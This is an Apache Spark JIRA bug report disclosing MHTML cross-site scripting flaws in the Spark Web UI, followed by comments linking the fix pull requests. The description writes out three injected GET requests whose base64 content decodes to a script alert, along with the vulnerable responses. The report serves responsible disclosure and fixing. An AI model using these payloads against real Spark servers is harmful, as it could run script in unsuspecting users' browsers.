Uploaded image for project: 'Spark'
  1. Spark
  2. SPARK-20393

Strengthen Spark to prevent XSS vulnerabilities

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 1.5.2, 2.0.2, 2.1.0
    • Fix Version/s: 2.1.2, 2.2.0
    • Component/s: Web UI
    • Labels:

      Description

      Using IBM Security AppScan Standard, we discovered several easy to recreate MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI application and these vulnerabilities were found to exist in Spark version 1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting attack is not really an attack on the Spark server as much as an attack on the end user, taking advantage of their trust in the Spark server to get them to click on a URL like the ones in the examples below. So whether the user could or could not change lots of stuff on the Spark server is not the key point. It is an attack on the user themselves. If they click the link the script could run in their browser and comprise their device. Once the browser is compromised it could submit Spark requests but it also might not.

      https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/

      Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
      _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
      Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
      HTTP/1.1

      Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related;
      boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
      </div>

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
      Type:%20multipart/related;%20boundary=_AppScan%0d%0a-_AppScan%0d%0aContent
      Location:foo%0d%0aContent-Transfer-
      Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
      k.pageSize=100 HTTP/1.1

      Excerpt from response: Content-Type: multipart/related;
      boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
      Type:%20multipart/related;%20boundary=_AppScan%0d%0a-_AppScan%0d%0aContent
      Location:foo%0d%0aContent-Transfer-
      Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
      eLength=0 HTTP/1.1

      Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
      Type: multipart/related; boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      security@apache was notified and recommended a PR.

        Issue Links

          Activity

          Hide
          apachespark Apache Spark added a comment -

          User 'ambauma' has created a pull request for this issue:
          https://github.com/apache/spark/pull/19538

          Show
          apachespark Apache Spark added a comment - User 'ambauma' has created a pull request for this issue: https://github.com/apache/spark/pull/19538
          Hide
          apachespark Apache Spark added a comment -

          User 'ambauma' has created a pull request for this issue:
          https://github.com/apache/spark/pull/19528

          Show
          apachespark Apache Spark added a comment - User 'ambauma' has created a pull request for this issue: https://github.com/apache/spark/pull/19528
          Hide
          srowen Sean Owen added a comment -

          Issue resolved by pull request 17686
          https://github.com/apache/spark/pull/17686

          Show
          srowen Sean Owen added a comment - Issue resolved by pull request 17686 https://github.com/apache/spark/pull/17686
          Hide
          apachespark Apache Spark added a comment -

          User 'n-marion' has created a pull request for this issue:
          https://github.com/apache/spark/pull/17686

          Show
          apachespark Apache Spark added a comment - User 'n-marion' has created a pull request for this issue: https://github.com/apache/spark/pull/17686

            People

            • Assignee:
              nmarion Nicholas Marion
              Reporter:
              nmarion Nicholas Marion
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:

                Development